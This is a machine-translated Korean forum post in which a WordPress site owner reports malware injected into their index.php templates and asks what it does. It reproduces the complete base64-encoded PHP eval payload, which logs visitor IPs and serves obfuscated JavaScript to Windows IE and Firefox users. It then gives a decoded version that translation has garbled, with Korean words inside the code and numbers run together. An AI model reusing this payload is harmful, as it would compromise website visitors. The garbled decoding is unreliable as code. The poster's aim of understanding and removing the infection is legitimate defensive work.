안녕하세요 여러분, 최근에 내 index.php 템플릿 파일이 내 서버의 모든 WordPress 설치에이 코드가 삽입되었음을 발견했습니다. <?php eval(base64_decode('JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTskZGJmPSRkci4nLycubWQ1KCRkcik7DQppZigoc3RycG9zKCR1YSwnV2luZG93cycpIT09ZmFsc2UpJiYoKHN0cnBvcygkdWEsJ01TSUUnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ0ZpcmVmb3gnKSE9PWZhbHNlKSkmJihzdHJwb3MoQGZpbGVfZ2V0X2NvbnRlbnRzKCRkYmYpLCRpcCkgPT09IGZhbHNlKSl7DQoJZXJyb3JfcmVwb3J0aW5nKDApOw0KCWVjaG8oYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkRDUwY25sN01TMXdjbTkwYjNSNWNHVTdmV05oZEdOb0tHRnpaQ2w3ZUQweU8zMGdhV1lvZUNsN1puSTlJbVp5YjIxRGFHRnlJanRtUFZzd0xDMHhMRGswTERrekxESXlMREk1TERreExERXdNU3c0T0N3eE1EZ3NPVGtzT1RBc01UQXhMREV3Tml3ek5TdzVOQ3c1TVN3eE1EVXNOakFzT1Rnc09UQXNNVEF3TERreExEazVMREV3Tnl3eE1EVXNOVFVzTVRFeUxEYzBMRGcyTERrMExEWTRMRGcyTERFd01DdzVNU3d5T1N3ek1DdzRPQ3d4TURBc09URXNNVEV4TERJNExETXlMRGd4TERNM0xEZzBMRE14TERFeE1pdzBMQzB4TEMweUxEQXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXcwT1N3eUxEQXNMVEVzTVRFMExESXpMRGt4TERrM0xERXdOaXc1TVN3eU1Td3hNVFFzTXl3dE1pd3dMQzB4TERnNUxERXdNaXc0T1N3eE1EWXNNVEF3TERreExEazVMREV3Tnl3ek5pd3hNRGdzTVRBMUxEazFMREV3TlN3NU1pd3pNQ3d5TXl3MU1TdzVOU3c1TVN3eE1EVXNPRGNzT1Rnc09USXNNaklzTVRBMExERXdOU3c0T1N3MU1Dd3pNQ3c1TkN3eE1EVXNNVEEzTERFd01pdzBOeXd6T0N3ek55dzRPU3d4TVRFc01UQXlMREV3TkN3NU55d3hNRGNzT1RNc01UQTVMRGszTERNMUxERXdNQ3d4TVRFc09URXNNVEV3TERNMkxERXdOaXd4TURZc016Y3NOVElzT1RRc01UQXhMRFV3TERReExESTVMREl4TERFeE1DdzVOU3c0T1N3eE1EY3NPVFFzTlRBc016QXNNemtzTXpjc016QXNNaklzT1RNc09USXNPVFVzT1RJc09UVXNNVEEyTERVd0xETXdMRE01TERNM0xETXdMREl5TERFd05Dd3hNRGNzTVRFeExEazNMRGt5TERVeExESTRMREV3T1N3NU5Td3hNRFFzT1RZc09EZ3NPVFFzT1Rrc09UVXNNVEExTERFeE1pdzBPQ3c1TXl3NU5pdzVNQ3c0T1N3NU1pd3hNREFzTkRnc01UQXpMREV3TVN3eE1EUXNPVFlzTVRBMkxEazBMREV3TWl3eE1EQXNORGNzT0Rnc09EZ3NNVEEwTERFd01pdzVPQ3d4TURZc01UQTNMRGt4TERRNExEazVMRGt4TERreExERXdOeXcwT0N3ek55dzFNQ3d4TURZc01UQXdMREV3TXl3ME9Dd3pOeXcxTUN3eU9TdzFNU3cxTVN3ek55dzVOQ3c1TXl3eE1EUXNPRFlzTVRBd0xEa3hMRFV4TERJMUxETXhMRFE0TERRc0xURXNMVElzTVRFMkxETXNMVElzTUN3NU1pd3hNRFlzTVRBeExEZzVMREV3TlN3NU5pd3hNREVzT1Rrc01qTXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXd4TVRNc01pd3dMQzB4TEMweUxERXdPU3c0Tnl3eE1ETXNNak1zT1RJc01qRXNOVElzTWpJc09Ea3NNVEF5TERnNUxERXdOaXd4TURBc09URXNPVGtzTVRBM0xETTJMRGc0TERFd05TdzVNU3c0Tml3eE1EY3NPVEVzTlRnc09Ua3NPVEVzT1Rnc09USXNNVEF3TERFd05Td3pNU3d5T1N3NU5DdzVNeXd4TURRc09EWXNNVEF3TERreExESTRMRE15TERRNUxEa3hMRE0zTERFd05TdzVNQ3d4TURjc05UVXNNVEExTERFd055d3hNRFFzT1RRc09Ea3NNVEEzTERFd05TdzVNaXd6TUN3eU9Dd3hNRFlzTVRBMExEZzRMRE13TERNMExESTRMRGsxTERFd05pd3hNRFVzTVRBekxEUTRMRE0yTERNNExEa3dMREV3T1N3eE1ETXNNVEExTERrMUxERXdPQ3c1TkN3eE1EY3NPVGdzTXpZc09UZ3NNVEV5TERreUxERXdPQ3d6Tnl3eE1EY3NNVEEwTERNNExEVXpMRGt5TERFd01pdzFNU3d6T1N3ek1Dd3pNU3cwT0N3NU15d3pOaXd4TURRc01UQTNMREV4TVN3NU55dzVNaXd6Tml3eE1EY3NPVFlzTVRBMUxEazBMRGc1TERrMUxEazNMRGsyTERFd05pd3hNVEFzTlRJc01qa3NPVE1zT1RZc09UQXNPRGtzT1RJc01UQXdMREk0TERVd0xEa3lMRE0xTERFd05pd3hNRFlzTVRFd0xEazVMRGt4TERNMUxERXdNeXd4TURFc01UQTBMRGsyTERFd05pdzVOQ3d4TURJc01UQXdMRFV3TERNd0xEZzNMRGczTERFd05pd3hNREVzT1Rjc01UQTRMREV3Tml3NU1Dd3pNQ3cwT1N3NU1Td3pOeXd4TURVc01UQTFMREV4TWl3NU9DdzVNQ3d6Tnl3NU9DdzVNQ3c1TXl3eE1EWXNOVEFzTXpBc016Z3NNamdzTlRBc09USXNNelVzTVRBMkxERXdOaXd4TVRBc09Ua3NPVEVzTXpVc01UQTNMREV3TVN3eE1ERXNOVElzTWprc016Y3NNekFzTkRrc09URXNNemNzTVRBMUxEa3dMREV3Tnl3MU5Td3hNRFVzTVRBM0xERXdOQ3c1TkN3NE9Td3hNRGNzTVRBMUxEa3lMRE13TERJNExERXhNQ3c1TlN3NE9Td3hNRGNzT1RRc01qZ3NNelVzTWprc016Z3NNemtzTWprc016QXNOVEFzT1RJc016VXNNVEEyTERreExERXdOU3cxTml3eE1EWXNNVEExTERFd05TdzVOU3c0Tnl3eE1EZ3NNVEEyTERrd0xETXhMREk1TERrekxEa3lMRGsxTERreUxEazFMREV3Tml3eU9Dd3pOU3d5T1N3ek9Dd3pPU3d5T1N3ek1DdzFNQ3d6TEMweUxEQXNMVEVzT0Rrc01UQXlMRGc1TERFd05pd3hNREFzT1RFc09Ua3NNVEEzTERNMkxEa3lMRGt5TERFd05pdzFPQ3c1T1N3NU1TdzVPQ3c1TWl3eE1EQXNNVEExTERFd05pdzFOaXd4TVRBc056VXNPRGNzT1RJc05qa3NPRGNzT1Rnc09USXNNekFzTWpnc09Ea3NNVEF4TERnNUxERXhNaXd5T1N3ek1DdzRNaXd6T0N3NE1pd3pOeXc0Tnl3eE1ERXNNVEF6TERreExEazVMRGt4TERVM0xEa3pMRGsyTERrNExEZzVMRE14TERreUxETXdMRFV3TERNc0xUSXNNQ3d4TVRWZE8zWTlJbVYyWVNJN2ZXbG1LSFlwWlQxM2FXNWtiM2RiZGlzaWJDSmRPM2M5Wmp0elBWdGRPM0k5VTNSeWFXNW5PM285S0NobEtUOGlRMjlrWlNJNklpSXBPM3A0UFdaeUszbzdabTl5S0drOU1EczFOamt0TlNzMUxXaytNRHRwS3oweEtYdHFQV2s3YVdZb1pTbHpQWE1yY2x0NmVGMG9LSGRiYWwwcU1Tc29PU3RsS0NKcUpUTWlLU2twS1R0OUlHbG1LSGdtSm1ZbUpqQXhNajA5UFRFd0tXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KCWlmICgkZnAgPSBAZm9wZW4oJGRiZiAsICJhIikpe2ZwdXRzKCRmcCAsICRpcC4nfCcpOyBmY2xvc2UoJGZwKTt9DQp9'));?>Wordpress 악성 코드 주입이 index.php 템플릿
일반적으로 base64 디코드를 처리하기에 충분히 간단하지만 다시 인코딩 한 것 같습니다.
내가 뭘 base64로 디코딩에서 얻을 것은
$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);
경우 ((strpos ($ UA, '윈도우')입니다! == false)를 & & ((strpos ($ UA는, 'MSIE')! = = false)) || (strpos ($ ua, 'Firefox')! == false)) & & (strpos (@file_get_contents ($ dbf), $ ip) === false)) { error_reporting (0);
if (x) {fr = "fromChar"; f = [0, -1,94,93,22,29,91,101,88,108] {try {1-prototype;} catch (asd) {x = 2; , 99,90101106359491105609890100919910710555112748694688610091293088100,91,111,28,32,81,37 84, 31, 112, -1,0, 38, 37, 89, 11, 101, 102, 97, 35, 100, 111, 93, 92, 95, 92, 95, 106, 50, 30, 39, 89,92,100481031011049610694102100478888104102981061079148999191107483750106100103483750,29,51,51,37,94, -1, -2,116,3, -2,092106101891059610199239591105879892104,29 , 32,113,2,0, -1, -2 , 109871032392215222891028910610091991073688105918610791589991989210010531299493104 , 86, 100, 91, 97, 82, 32, 109, , 98, 36, 98, 112, 102, 138, 37, 107, 104, 38, 53, 102, , 29,93,96,90899210028509235106106110999135103101104961069410210050308787106101971081069030499137105105,112 , 98, 90, 37, 98, 90, 103, 106, 50, 30, 38, 28, 50, , 94,89,107105923028110958910794283529383929305092351069110556106105105958710810690,31,29 , 93,92,95,92,95,1062835293839293050,3, -2,0, -1,89,102891061009199107369292106 , 58,99,91,98,92,10010510656110758792698798923028891018911229308238823787101103,91 , 99,91,57,93,96,98,89,31,92, w = f, s = [], r = 문자열, z = ((w + w) i = 0, 569-5 + 5-i> 0, i + 1) {j = i, if (e) s = s + (x && f && 012 === 10) e (s);if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
}
너희들은 나 악성 코드가
감사